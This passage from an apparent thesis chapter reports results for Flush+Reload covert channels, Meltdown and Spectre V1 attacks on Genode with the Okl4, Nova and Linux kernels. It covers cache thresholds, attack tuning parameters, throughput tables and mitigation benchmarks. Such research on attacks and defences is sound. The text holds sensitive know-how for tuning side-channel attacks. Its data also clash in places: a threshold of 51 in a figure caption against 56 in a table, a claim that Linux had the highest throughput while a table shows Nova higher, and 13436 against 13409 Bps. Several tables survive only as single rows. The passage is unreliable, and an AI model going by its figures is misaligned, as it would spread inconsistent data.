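    uint64_t max = samples[0];
    for (size_t k = 1; k < n; k++)
        if (samples[k] > max)
            max = samples[k];
    return max;
}

/* Valid interval for a level's threshold: from its own maximum up to one cycle
 * below the fastest access seen at the next, slower level. lo > hi means the
 * two distributions overlap and no threshold separates them. */
static struct interval valid_interval(const uint64_t *level, size_t n,
                                      const uint64_t *slower, size_t m)
{
    assert(slower && m > 0);
    uint64_t min = slower[0];
    for (size_t k = 1; k < m; k++)
        if (slower[k] < min)
            min = slower[k];
    assert(min > 0);
    struct interval iv = { pick_threshold(level, n), min - 1 };
    return iv;
}
```

Choosing the lower end of the interval, as the thesis does, minimizes false positives from the slower level at the cost of sensitivity to a single slow outlier among the profiled hits.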


[Figure: access time in cycles (0 to 300) for each value index (0 to 255) for uncached, LLC-cached and L1-cached values, with thresholds tL1 = 51 and tLLC = 81 marked]

Figure 4.1: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4.

[Figure: access time in cycles (0 to 300) for each value index (0 to 255) for uncached, LLC-cached and L1-cached values, with thresholds tL1 = 42 and tLLC = 80 marked]

Figure 4.2: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova.

Kernel   tLLC   Valid interval for tLLC   tL1   Valid interval for tL1
Okl4     81     [81, 239]                 56    [56, 72]
Nova     80     [80, 219]                 42    [42, 64]
Linux    139    [139, 239]                54    [54, 78]

Table 4.1: The cache-hit thresholds in CPU cycles for each kernel.


Tables 4.2 to 4.4 show the number of detected cache hits from the array reads using the SRGs from Equations (3.2) and (3.3) and different sizes of the internal padding. The SRG 49i mod 256 keeps the number of detected cache hits at two or fewer down to an internal padding of 256 bytes, the smallest of all tested access patterns, and thus results in the smallest memory footprint of the Flush+Reload channel. Therefore, the SRG in Equation (3.2) and an internal padding of 256 bytes were used to obtain further results.

Internal padding (bytes)   4096   2048   1024    512     256     128
49i mod 256                0      0      0       0       2       8173
33i mod 256                0      0      2299    1       400     5916
i (sequential)             0      0      28777   31427   31974   61137

Table 4.2: Number of cache hits from iterating 256 times over an uncached array using an SRG, on Genode+Okl4, for different internal padding sizes.


[Figure: access time in cycles (0 to 300) for each value index (0 to 255) for uncached, LLC-cached and L1-cached values, with thresholds tL1 = 54 and tLLC = 139 marked]

Figure 4.3: Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux.

Internal padding (bytes)   4096   2048   1024    512     256     128
49i mod 256                0      0      0       1       1       8936
33i mod 256                0      0      1900    1       401     7283
i (sequential)             0      0      27357   31666   32242   61541

Table 4.3: Number of cache hits from iterating 256 times over an uncached array using an SRG, on Genode+Nova, for different internal padding sizes.

Internal padding (bytes)   4096   2048   1024    512     256     128
49i mod 256                1      0      0       0       1       7569
33i mod 256                0      1      1787    0       400     5798
i (sequential)             0      0      14691   29007   33259   62166

Table 4.4: Number of cache hits from iterating 256 times over an uncached array using an SRG, on Genode+Linux, for different internal padding sizes.

[Figure: number of cycles (0 to 300) per iteration (0 to 255) for the access patterns idx = 49i mod 256, idx = 33i mod 256 and sequential access]

Figure 4.4: Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on Okl4.


[Figure: number of cycles (0 to 300) per iteration (0 to 255) for the access patterns idx = 49i mod 256, idx = 33i mod 256 and sequential access]

Figure 4.5: Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4.

Figures 4.4 and 4.5 show the time it takes to fetch each value in an uncached array using internal paddings of 256 and 4096 bytes respectively. The plots were created by iterating over the array in some order and measuring the time for each array access. Measurements using a sequential access pattern are presented for completeness. Figure 4.5 shows that there is no prefetching when an internal padding of 4096 bytes is used. Figure 4.4 shows that the SRG idx = 49i mod 256 results in memory access times comparable to DRAM accesses. Thus, it successfully prevents prefetching, and the internal padding can be reduced to 256 bytes without performance degradation.


Our results in Tables 4.5 and 4.6 show how Flush+Reload can be used as a side or covert channel both between and within processes; Linux had the highest throughput in both cases. Linux had a similar or lower number of correct bytes but still had a greater throughput than the microkernels, which shows that Linux had a lower execution time than Okl4 and Nova.

Flush+Reload was able to transmit a maximum of 26383 Bps when reading and writing in the same process using one attempt. The data for each kernel is presented in Table 4.5. Flush+Reload, when used as a covert channel, was able to transmit a maximum of 13436 Bps between two processes using one attempt. The data for each kernel is presented in Table 4.6. The low throughput on Okl4 and Nova may be a consequence of the locking mechanism used; for further discussion, see Section 5.1.4.

Kernel   Correct   Incorrect   Missing   Throughput (Bps)
Okl4     1858      190         0         1651
Nova     1711      331         6         29500
Linux    1926      122         0         26383

Table 4.5: Reading 2048 bytes with Flush+Reload within one process.


Kernel   Correct   Incorrect   Missing   Throughput (Bps)
Okl4     1777      255         0         36
Nova     1803      245         0         44
Linux    1247      281         520       13409

Table 4.6: Reading 2048 bytes with Flush+Reload between two processes.

The results of using the noise-reduction method described in Section 3.2.5 are presented in this section. Tables 4.7 to 4.9 contain the results of noise reduction when Flush+Reload was used within a process. Tables 4.10 to 4.12 show the results of noise reduction when Flush+Reload was used to communicate between processes. As can be seen in Table 4.7, there was a slight increase in throughput for two attempts on Genode+Okl4. On Genode+Linux, the increase was more substantial, see Table 4.12. Consequently, two attempts were used for further results on Genode+Linux for communication between two processes.

Number of Attempts   Correct   Incorrect   Missing   Throughput (Bps)
1                    1858      190         0         1651
2                    1879      169         0         1655
3                    1885      163         0         1578
4                    1884      164         0         1481
5                    1890      158         0         1428
6                    1886      162         0         1372
7                    1887      161         0         1301
8                    1888      160         0         1250
9                    1889      159         0         1202
10                   1889      159         0         1160

Table 4.7: Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different numbers of attempts.


10 1737 304 7 3080

Table 4.8: Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different numbers of attempts.



10 1857 191 0 3085

Table 4.9: Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different numbers of attempts.


10 1931 133 0 4

Table 4.10: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different numbers of attempts.


10 1791 257 0 4

Table 4.11: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different numbers of attempts.



10 2048 0 0 2296

Table 4.12: Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different numbers of attempts.


4.2 Meltdown

The throughput of the Meltdown attack targeting a victim, as described in Section 3.3, is presented in Section 4.2.1. The negative result of targeting the Linux version banner is presented in Section 4.2.2.

4.2.1 Reading a Victim’s Secret

The throughput of our Meltdown attack when reading 2048 bytes from another process is shown in Figure 4.6. The throughput fluctuates, ranging from 63 to 11070 Bps.

[Plot: throughput (Bps) against test number]

Figure 4.6: Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux.

4.2.2 Reading the Linux Version Banner

Reading the Linux banner with the Meltdown attack was unsuccessful; no bytes were transmitted. Hence, the attack had a throughput of 0 Bps.

4.3 Spectre

The choice of $N_a$ and $T_a$ is presented in Section 4.3.1, and the choice of $H_s$ to ensure speculative execution in Section 4.3.2. The throughput of the Spectre V1 attack using these parameter choices is presented for all kernels in Section 4.3.3, and benchmarks of RPCs with and without mitigations are presented in Section 4.3.4.

4.3.1 Training the Branch Predictor

The attack period, $T_a$, and the number of attacks per measurement, $N_a$, were tested for $2 \le T_a \le 10$ and $1 \le N_a \le 10$ on Okl4, Nova and Linux. The results are shown in Figures 4.7 to 4.9. All kernels have their highest throughput at $N_a = 1$ and $T_a = 3$. Furthermore, the throughput tends to decrease as $N_a$ or $T_a$ increases.
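To make the two parameters concrete, the sketch below builds the call pattern of one measurement under an assumed interpretation of the method chapter: every out-of-bounds attack call is preceded by $T_a - 1$ in-bounds training calls, and $N_a$ such periods form one measurement. The function `attack_schedule` is hypothetical; it only produces the pattern and performs no memory accesses.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: writes the call pattern of one measurement into
 * kind[0 .. na*ta - 1] and returns its length. Under the assumed meaning of
 * the parameters, every ta-th call is an out-of-bounds attack call (1) and
 * the ta - 1 calls before it are in-bounds training calls (0). */
size_t attack_schedule(int *kind, size_t capacity, size_t na, size_t ta)
{
    assert(ta >= 1);
    size_t total = na * ta;
    assert(kind != NULL && total <= capacity);
    for (size_t j = 0; j < total; j++)
        kind[j] = ((j + 1) % ta == 0) ? 1 : 0;
    return total;
}
```

With the best values found, $N_a = 1$ and $T_a = 3$, this interpretation gives two training calls followed by one attack call per measurement.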

[Plot: throughput (Bps, 0 to 800) over $N_a \in [1, 10]$ and $T_a \in [2, 10]$]

Figure 4.7: Throughput of the Spectre attack for different choices of $T_a$ and $N_a$ when reading a total of 2048 bytes on Genode+Okl4.

[Plot: throughput (Bps, 0 to 1500) over $N_a \in [1, 10]$ and $T_a \in [2, 10]$]

Figure 4.8: Throughput of the Spectre attack for different choices of $T_a$ and $N_a$ when reading a total of 2048 bytes on Genode+Nova.

[Plot: throughput (Bps, 0 to 3000) over $N_a \in [1, 10]$ and $T_a \in [2, 10]$]

Figure 4.9: Throughput of the Spectre attack for different choices of $T_a$ and $N_a$ when reading a total of 2048 bytes on Genode+Linux.


4.3.2 Ensuring Speculative Execution

The Spectre V1 attack on Okl4, Nova and Linux had its highest throughput at $H_s = 2^{15}$, $2^{17}$ and $2^{20}$, respectively, see Figure 4.10. Note that the best $H_s$ differs by a factor of $2^5$ between kernels; thus, choosing a single value for all kernels is likely not suitable.

[Plot: throughput (Bps, 0 to 2000) against $H_s$ from $2^6$ to $2^{24}$ for Okl4, Nova and Linux]

Figure 4.10: Throughput for Spectre V1 using different choices of $H_s$ for heuristically flushing the cache.

4.3.3 Attack Throughput

The result of trying to read 2048 bytes from an array containing random values with our Spectre V1 implementation is presented in Table 4.13. The results show the highest throughput for Nova, at 1760 Bps.

Kernel   Retries   $N_a$   $T_a$   $H_s$      Throughput (Bps)
Okl4     1         1       3       $2^{15}$   1029
Nova     1         1       3       $2^{17}$   1760
Linux    2         1       3       $2^{20}$   525

Table 4.13: Result of reading 2048 bytes with Spectre V1 with the chosen parameters.

4.3.4 Mitigations

The RPC benchmarks on Okl4, Nova and Linux before and after applying Spectre V1 mitigations are presented in Figures 4.11 to 4.13. The relative slowdown caused by these mitigations is presented in Tables 4.14 and 4.15.
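The two mitigation styles compared in Figures 4.11 to 4.13 can be sketched on a hypothetical bounds-checked read, similar in spirit to the vulnerable RPC. This is not the patch applied in the thesis: the accessor names are illustrative, lfence is reached through the SSE2 intrinsic `_mm_lfence()`, and the mask is modeled on the generic C fallback of Linux's `array_index_mask_nospec()`.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

#if defined(__x86_64__)
#include <emmintrin.h>
/* lfence: no later instruction begins execution until all earlier ones have
 * completed locally, so the load after it waits for the bounds check. */
#define SPECULATION_BARRIER() _mm_lfence()
#else
/* Fallback for other targets: a compiler barrier only, NOT a speculation
 * barrier. Replace it with the architecture's own barrier in real use. */
#define SPECULATION_BARRIER() __asm__ __volatile__("" ::: "memory")
#endif

#define BITS_PER_LONG (sizeof(long) * CHAR_BIT)

/* Returns ~0UL if index < size and 0 otherwise, without a branch.
 * Assumes size <= LONG_MAX and an arithmetic right shift of negative longs
 * (GCC and Clang). The empty asm hides index from the optimizer so that the
 * mask is not folded away after the bounds check. */
static inline unsigned long array_index_mask_nospec(unsigned long index,
                                                    unsigned long size)
{
    __asm__("" : "+r"(index));
    return ~(long)(index | (size - 1UL - index)) >> (BITS_PER_LONG - 1);
}

/* Hypothetical accessor protected by serialization (lfence). */
int read_elem_lfence(const unsigned char *arr, size_t len, size_t idx)
{
    assert(arr != NULL);
    if (idx >= len)
        return -1;
    SPECULATION_BARRIER();
    return arr[idx];
}

/* Hypothetical accessor protected by index masking: if the bounds check is
 * mispredicted, the masked index becomes 0, so only arr[0] can be loaded. */
int read_elem_mask(const unsigned char *arr, size_t len, size_t idx)
{
    assert(arr != NULL);
    if (idx >= len)
        return -1;
    idx &= array_index_mask_nospec(idx, len);
    return arr[idx];
}
```

Both variants add only a few instructions to the call path, which is consistent with the small relative slowdowns reported in Tables 4.14 and 4.15.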

[Two panels: CPU cycles ($\times 10^4$, about 1.95 to 2.2) against test number (1 to 512); left: no mitigation vs. lfence; right: no mitigation vs. array_index_mask_nospec]

Figure 4.11: Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations.

[Two panels: CPU cycles ($\times 10^4$, about 3.3 to 3.7) against test number (1 to 512); left: no mitigation vs. lfence]

Figure 4.12: Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations.


[Two panels: CPU cycles ($\times 10^4$, about 4 to 7) against test number (1 to 512); left: no mitigation vs. lfence]

Figure 4.13: Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations.

Kernel   Mean     Standard deviation
Okl4     0.9875   0.2305
Nova     0.9992   0.0090
Linux    1.0077   0.3430

Table 4.14: Mean relative slowdown and standard deviation after applying the lfence mitigation.

Kernel   Mean     Standard deviation
Okl4     0.9908   0.3242
Nova     1.0028   0.0107
Linux    1.0310   0.3365

Table 4.15: Mean relative slowdown and standard deviation after applying the bitmask mitigation.
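A minimal sketch of how such a summary can be computed, assuming that the relative slowdown of test $i$ is the ratio of the mitigated to the unmitigated cycle count for the same test number (the exact definition belongs to the method and is not restated here). The function `relative_slowdown` is hypothetical; it returns the mean and the sample variance, whose square root (for example via `sqrt()` from `<math.h>`) gives the standard deviation reported in Tables 4.14 and 4.15.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: per-test relative slowdown r_i = mitigated_i / baseline_i,
 * summarized by its mean and sample variance (n - 1 in the denominator).
 * A mean below 1 means the mitigated RPC was on average faster. */
void relative_slowdown(const double *baseline, const double *mitigated,
                       size_t n, double *mean, double *variance)
{
    assert(n >= 2 && baseline != NULL && mitigated != NULL);
    double sum = 0.0;
    for (size_t i = 0; i < n; i++)
        sum += mitigated[i] / baseline[i];
    *mean = sum / (double)n;

    double sq = 0.0;
    for (size_t i = 0; i < n; i++) {
        double d = mitigated[i] / baseline[i] - *mean;
        sq += d * d;
    }
    *variance = sq / (double)(n - 1);
}
```

Under this definition, a mean slightly below 1, as for Okl4 and Nova with lfence, means that the mitigated RPC was on average marginally faster than the unmitigated one.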

4.3.5 Error Sources

During measurements, some anomalies were identified, one being unstable performance on the Linux kernel. Figure 4.14 shows how the results for the different kernels change between compilations of the same source code, and Figure 4.15 shows the results between runs of the same binaries.

[Plot: accuracy (20% to 100%) against test number for Okl4, Nova and Linux]

Figure 4.14: Percentage of correctly read bytes from reading 2048 bytes, recompiling the application between tests.

[Plot: accuracy (0% to 100%) against test number for Okl4, Nova and Linux]

Figure 4.15: Percentage of correctly read bytes from reading 2048 bytes when running the same binary multiple times on Linux.


5 Discussion

The method is discussed in terms of its reliability, validity and replicability in conjunction with each attack. Anomalies in the results are also discussed. The impact of this work, microarchitectural attacks and SCAs are discussed in a wider context in Section 5.5.

The produced covert channel and Spectre attack are considered successful, whereas further work is needed to evaluate whether microkernels are vulnerable to Meltdown.

We have shown that it is possible to use a Flush+Reload channel to communicate both within and between processes, consequently breaking Genode's strict IPC policies. We have demonstrated that it is possible to construct a Meltdown attack targeting Genode and that this attack is successful on Genode+Linux. Furthermore, a Spectre V1 attack has been performed successfully on all the tested kernels.

Microarchitectural attacks are highly reliant on hardware, and despite our best efforts we have not found detailed guidance on how to configure these attacks; this is likely in part due to the proprietary nature of the hardware. Consequently, it may be difficult to obtain the same results on other hardware. However, the methodology should be reproducible on other hardware supporting the same instruction sets. Factors not detailed for the tested system may affect the results, such as other processes running concurrently on the system or how the processes are scheduled on the CPU cores.

5.1 Flush+Reload

Although Flush+Reload is conceptually well defined, its realization may vary with the available timers. Moreover, some implementation-specific techniques have been used; these need evaluation, and their validity requires some discussion.

5.1.1 Cache-Hit Measurements

One validity issue with our method of measuring cache hits is that there is no guarantee that all accesses measured below the LLC threshold were actually served by the LLC. It is entirely possible for the kernel to schedule the measuring process and the measured process on the same core, thereby allowing values to be served from caches below the LLC. Consequently, all these measurements may be from lower-level caches. However, it is highly likely that the measurements were from the LLC or the L2 cache, since measuring the LLC gave different results than measuring the L1 cache.

We deem issues with the L1 cache threshold less likely. It is possible that all supposed L1 accesses were in fact served by higher-level caches, but given the simpler measurement method, at least some measurements should be of the L1 cache.

5.1.2 Choosing Cache-Hit Thresholds

As can be seen in Figures 4.2 and 4.3, there are significant spikes for some uncached values. These spikes are unlikely to be regular DRAM accesses, as they are significantly slower than the expected ≈250 cycles. These values lie in the range [1000, 2500] cycles and are more likely the result of context switches between the start and end of the timer. This is less likely to happen in the LLC and L1 cache tests, as the fetch times for these values are lower and therefore give the kernel less time to context switch.

The Spectre and Meltdown exploits are highly dependent on hardware; thus, efforts to replicate them on other CPUs may give different results. The cache-hit thresholds $t_{L1}$ and $t_{LLC}$ shown in Figures 4.1 to 4.3 may have to be chosen differently depending on cache and memory speeds. Zhou et al. [50] suggest that thresholds should be chosen just below the lower bound of the closest higher memory level. However, we found that following this recommendation resulted in a noisy channel with a lower throughput on the tested machine.
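The rule attributed to Zhou et al. [50] can be sketched as follows, assuming latency samples in cycles for the next slower memory level (LLC samples when choosing $t_{L1}$, DRAM samples when choosing $t_{LLC}$). The helper `threshold_below_next_level` is hypothetical, and, as noted above, this rule gave a noisier channel than the thresholds actually used on the tested machine.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper for the rule of Zhou et al.: given latency samples
 * (in cycles) for the next slower memory level, return a threshold just
 * below the smallest of them. Accesses measured below the threshold are
 * then classified as hits in the faster level. */
uint64_t threshold_below_next_level(const uint64_t *slower, size_t n)
{
    assert(slower != NULL && n > 0);
    uint64_t lowest = slower[0];
    for (size_t i = 1; i < n; i++) {
        if (slower[i] < lowest)
            lowest = slower[i];
    }
    return lowest > 0 ? lowest - 1 : 0;
}
```

Slow outliers, such as the context-switch spikes of 1000 to 2500 cycles discussed above, do not affect this rule, since only the minimum of the slower level is used.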


With the objective of preventing data prefetching, Figure 4.5 shows that using an offset of 4 kB successfully removes false cache hits. Furthermore, Tables 4.2 to 4.4 show that using an SRG can significantly reduce memory requirements. However, one SRG does not get progressively worse for smaller padding sizes, which is surprising, as the CPU is expected to detect semi-sequential patterns more easily for smaller paddings. In addition, the SRG may need to be evaluated on each CPU. Some SRGs likely perform better than others in general, as the main factor triggering prefetching is subsequent sequential accesses; thus, the performance depends on whether the sequence generated by the SRG contains such a pattern. It may also be possible to exclude SRGs and instead craft a non-sequential pattern that yields good results.
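As an example of a fixed non-sequential access pattern, the sketch below visits the 256 probe entries in the order $i \mapsto (167 i + 13) \bmod 256$, the multiply-add permutation used in the proof of concept of Kocher et al. [24], combined with the 4 kB offset discussed above. It is a stand-in for illustration, not one of the SRGs evaluated in this thesis, and the function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define PROBE_ENTRIES 256   /* one entry per possible byte value */
#define PROBE_STRIDE  4096  /* 4 kB between entries, as in Figure 4.5 */

/* Index of the i-th probed entry. Because 167 is odd, multiplication by it
 * is a bijection modulo 256, so every entry is visited exactly once, but
 * consecutive visits are far apart and not in a sequential order. */
size_t probe_index(size_t i)
{
    assert(i < PROBE_ENTRIES);
    return (i * 167 + 13) & (PROBE_ENTRIES - 1);
}

/* Byte offset of the i-th probed entry from the start of the probe array. */
size_t probe_offset(size_t i)
{
    return probe_index(i) * PROBE_STRIDE;
}
```

The first two entries visited are 13 and 180, and the whole sequence is a permutation of 0 to 255, so no byte value is skipped.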

5.1.4 Inaccuracies in Throughput Measurements

Two different methods were used to measure the execution time. For Okl4, the execution time was measured on the measuring system. This method is less accurate, as the delay of delivering data via serial communication affects the measurements. Hence, for low attempt counts the measured execution time is dominated by this overhead, and a longer execution time reduces the relative impact of the delay. This may be why Okl4 is the only kernel with a higher throughput at two attempts when using Flush+Reload as a channel within a process, see Table 4.7. Doubling the number of attempts is expected to roughly double the execution time. It is therefore unexpected that Flush+Reload within a process performs equally well for one and two attempts, with only a small change in the number of correct bytes, as is observed on Okl4.
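The effect of a fixed measurement overhead can be illustrated with a simple model: total time is a constant overhead plus a cost proportional to the number of attempts. This model is an assumption, not a fit to the measured data, and the parameter values in the usage below are hypothetical.

```c
#include <assert.h>

/* Hypothetical model: every run pays a fixed overhead (for example,
 * delivering data over the serial line) plus a cost per attempt.
 * Throughput is the number of bytes divided by the total time. */
double modeled_throughput(double bytes, unsigned attempts,
                          double t_attempt_s, double t_overhead_s)
{
    assert(attempts > 0 && t_attempt_s > 0.0 && t_overhead_s >= 0.0);
    return bytes / (t_overhead_s + attempts * t_attempt_s);
}
```

With an overhead of 1 s and 10 ms per attempt, going from one to two attempts lowers the modeled throughput of 2048 bytes by only about 1%, whereas without overhead it halves it.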

Genode+Linux had a significantly higher throughput than Genode on the microkernels. We believe that, when Flush+Reload is used to communicate between processes, the significant difference in throughput is largely due to the processes being scheduled on the same core on Genode+Nova/Okl4. This is based on a much slower execution time when synchronization was applied, indicating that the majority of the execution time on Nova and Okl4 is due to locking. The throughput of Flush+Reload with a different synchronization strategy may be significantly higher than with the current implementation.


Tables 4.8 to 4.11 show no substantial improvement of the covert channel with respect to the number of attempts. The concept may be more successful in cases where synchronization is not performed or where synchronization measures are not available. The only test giving a higher number of correct bytes was Genode+Linux using Flush+Reload between two processes, see Table 4.12.

5.2 Meltdown

Our Meltdown attack gave a fluctuating throughput, ranging from 63 to 11070 Bps. An implementation returning only 0xFF would produce a byte observed as correct every 256th transmission, or 8 times out of 2048, assuming uniformly distributed input. Furthermore, the execution time of the attack was approximately 0.1 s. Therefore, an attack returning only noise would have a throughput of

$$\frac{8\ \text{bytes}}{0.1\ \text{s}} = 80\ \text{Bps}.$$

Thus, results with a throughput of around 80 Bps are regarded as noise.
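The noise baseline above follows from a short calculation, reproduced here as a sketch. The function name is hypothetical; as in the text, uniformly distributed secret bytes and an execution time of about 0.1 s are assumed.

```c
#include <assert.h>

/* Expected throughput of a channel that always outputs the same value
 * (e.g. 0xFF): with uniformly distributed secret bytes, a fraction
 * 1/alphabet of the outputs is correct purely by chance. */
double chance_throughput_bps(double total_bytes, double alphabet,
                             double exec_time_s)
{
    assert(alphabet > 0.0 && exec_time_s > 0.0);
    double chance_correct = total_bytes / alphabet;  /* 2048 / 256 = 8 bytes */
    return chance_correct / exec_time_s;             /* 8 bytes / 0.1 s */
}
```

Calling `chance_throughput_bps(2048, 256, 0.1)` gives about 80 Bps, the level below which a measured throughput cannot be distinguished from noise.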

5.2.1 Alternative Segmentation Fault Recovery

Two methods were evaluated for recovering from the segmentation fault triggered by the illegal read: spawning a child process and Intel TSX. Although the second approach requires specific hardware, the first poses several problems. Firstly, a second process must be allocated, and it takes time to allocate and start this process. Secondly, the sender and receiver must be synchronized, as there are now potentially two concurrently running processes. Thirdly, the illegal read raises a segmentation fault in the kernel, crashing the sender. With Intel TSX, the faulty access still occurs, but the TSX mechanism protects the process from kernel interference, as the transaction that raised the fault is aborted and rolled back, so the code is conceptually never executed.
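Because TSX-based recovery only works where the hardware supports it, a program can check for Restricted Transactional Memory (RTM) before choosing a recovery strategy. A minimal sketch, assuming GCC or Clang on x86 and their `<cpuid.h>` header; RTM is reported in CPUID leaf 7, subleaf 0, EBX bit 11. The function name `cpu_has_rtm` is hypothetical, and a set bit does not guarantee that transactions will commit, since TSX may be disabled or forced to abort on some CPUs.

```c
#include <assert.h>

#if defined(__x86_64__) || defined(__i386__)
#include <cpuid.h>
#endif

/* Returns 1 if CPUID reports Intel TSX RTM support, 0 otherwise
 * (including on non-x86 targets, where the check does not apply). */
int cpu_has_rtm(void)
{
#if defined(__x86_64__) || defined(__i386__)
    unsigned int eax, ebx, ecx, edx;
    /* __get_cpuid_count returns 0 if leaf 7 is not supported. */
    if (!__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx))
        return 0;
    return (int)((ebx >> 11) & 1u);
#else
    return 0;
#endif
}
```

A program could use this check to fall back to a slower recovery design, such as the child-process approach, when RTM is not available.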

We were unsuccessful with the child-spawning design: it was significantly slower, the overhead of starting processes became a bottleneck, and it eventually caused a segmentation fault in the receiver. This design may still be made to work, thus removing the need for Intel TSX. However, such a design will still suffer from significantly slower execution due to the overhead of spawning processes.

5.2.2 Turning off Mitigations

It may be considered unreasonable to turn off the Meltdown mitigations in order to allow the attack to work. However, since the performance impact of these mitigations can be significant for applications that are heavy on system calls, we think this case is still of interest. Furthermore, turning off the mitigations has allowed us to establish that Genode is vulnerable to the Meltdown attack and that Genode itself does nothing to prevent it.

5.2.3 The Difficulties of Reading Secrets

The Meltdown attack presented some difficulties in the context of Genode. Genode did not support controlling which core a process executes on, nor did it provide access to a sched_yield operation. Both of these tools greatly improve the success of the published Meltdown POC [31].


5.2.4 Reliability Issues with Meltdown

We were able to read with a throughput of approximately 11000 Bps in some tests; however, we were only able to reproduce this a handful of times. We suspect that the reliability issues are due to scheduling race conditions and uncached data. We base this on the fact that the Meltdown attack is very successful at reading its own process's memory.

We were not able to read the Linux banner, and we have not been able to determine whether this is pure coincidence or due to other circumstances. One aspect that made reading the Linux banner more difficult was the lack of cached data: in our experiment, the banner was not cached prior to the attack, which may lower the chance of success.

5.3 Spectre

Some of the methodologies used to implement Spectre may prove suboptimal or ineffective on different systems. As these attacks are highly reliant on hardware, the methodologies for configuring the attack may not generalize well to other hardware. Using retries to improve transmission success has been tried by others [24] but did not significantly improve the results in our experiments. Furthermore, the performance of an SRG was shown to vary significantly depending on the distance between accessed values and on which SRG is used.

The Spectre V1 attack abuses a very specific type of RPC. The results show that neither Genode nor the microkernels Nova and Okl4 are immune to the Spectre V1 attack. Therefore, mitigations need to be applied to protect against Spectre.

5.3.1 Training the Branch Predictor

First of all, it should be noted that the method for choosing $N_a$ and $T_a$ is unlikely to be optimal. To the best of our knowledge, no work has demonstrated optimizations of these values. Thus, the purpose of choosing $N_a$ and $T_a$ with respect to throughput is merely to find working values and to gauge the magnitude of the possible throughput.

The results of trying different numbers of attacks per measurement, $N_a$, and attack periods, $T_a$, can be seen in Figures 4.7 to 4.9. All three results have their greatest peaks at $N_a = 1$ and $T_a = 3$ and tend towards lower throughput for larger values of $N_a$ and $T_a$. Linux seems to show a somewhat random pattern; the variations may be due to the instability of the implementation on Genode+Linux, see Figures 4.14 and 4.15.

The computer was not reset between the tests for choosing $N_a$ and $T_a$, in order to reduce the execution time of the tests. This may have led to some noise when reading the first bytes, since the BTB had not been flushed. However, the large number of bytes read by the attack should have reduced the impact of this noise on the result.

5.3.2 Criticism of Heuristic Cache Flush

The heuristic cache flush technique described in Section 3.4.1 has not been verified; it was used because no other method of flushing the cache without a reference address was found. The results in Section 4.3.2 were obtained as a step towards verifying the methodology. It is noteworthy that the throughput declines with increasing sizes. We deem this likely to be due to increased execution time, as one would expect a linear decline when increasing the size, given that the cache flush is successful above some size.
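Section 3.4.1 describes the technique actually used. As a hedged approximation, assuming that $H_s$ denotes the size in bytes of a buffer that is read to push other data out of the cache and a 64-byte cache line, such a flush could look like the sketch below. The function `heuristic_flush` is hypothetical; it shows why the work, and hence the execution time, grows linearly with $H_s$.

```c
#include <assert.h>
#include <stddef.h>

#define CACHE_LINE_SIZE 64 /* assumed cache-line size in bytes */

/* Hypothetical heuristic flush: read one byte from every cache line of a
 * buffer of hs bytes, hoping to displace previously cached data. Nothing
 * guarantees that any particular line is evicted, so success can only be
 * inferred indirectly (e.g. from attack throughput). The volatile reads and
 * the returned sum keep the compiler from removing the loop. */
unsigned long heuristic_flush(const volatile unsigned char *buf, size_t hs)
{
    assert(buf != NULL || hs == 0);
    unsigned long sum = 0;
    for (size_t off = 0; off < hs; off += CACHE_LINE_SIZE)
        sum += buf[off];
    return sum;
}
```

Doubling $H_s$ doubles the number of cache lines touched, which matches the expectation that larger flush sizes lengthen each measurement.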

5.3.3 Throughput Anomalies

Table 4.13 shows the throughput of our Spectre V1 attack, where the throughput for both Okl4 and Nova was higher than the throughput of the Flush+Reload channel used. This may seem strange, but it is probably an effect of our locking method described in Section 3.2.4. Our Spectre attack does not use the same locking and instead uses the RPC call as a lock, which seems to be more efficient. The current implementation of Flush+Reload uses busy waiting; a better solution would probably be to yield during the wait, increasing the chance of the other process being scheduled and lowering the execution time. However, we could not find an easy and working method of yielding in Genode.
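The yielding alternative mentioned above can be sketched with POSIX `sched_yield()` and a C11 atomic flag. This is an assumption-based illustration for a POSIX system, not Genode code and not the locking of Section 3.2.4; the function `wait_for_flag` is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sched.h>
#include <stdatomic.h>

/* Hypothetical wait loop for a sender/receiver handshake: instead of pure
 * busy waiting, give up the CPU between polls so that the peer process or
 * thread can be scheduled, which matters when both share one core.
 * Returns the number of polls needed until flag == expected. */
unsigned long wait_for_flag(atomic_int *flag, int expected)
{
    assert(flag != NULL);
    unsigned long polls = 1;
    while (atomic_load_explicit(flag, memory_order_acquire) != expected) {
        sched_yield(); /* let another runnable task use this core */
        polls++;
    }
    return polls;
}
```

The peer would set the flag with `atomic_store_explicit(flag, value, memory_order_release)`, so that data written before the store is visible once the waiter observes the new value.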

It can be observed in Figures 4.14 and 4.15 that the accuracy $a_{\text{Linux}}$ varies substantially between compilations and executions: $12\% \le a_{\text{Linux}} \le 99\%$ between compilations and $12.4\% \le a_{\text{Linux}} \le 99.1\%$ between runs. Due to the hardware-dependent nature of the problem, small differences in the generated assembly may lead to different results. Hence, efforts to reproduce the results for Linux may vary. For Okl4 and Nova the variations were substantially smaller: $39.1\% \le a_{\text{Okl4}} \le 54.9\%$ and $78.3\% \le a_{\text{Nova}} \le 97.3\%$ between compilations, and $52.3\% \le a_{\text{Okl4}} \le 54.9\%$ and $84.4\% \le a_{\text{Nova}} \le 97.5\%$ between runs, respectively.

5.3.4 Small Impact on Performance

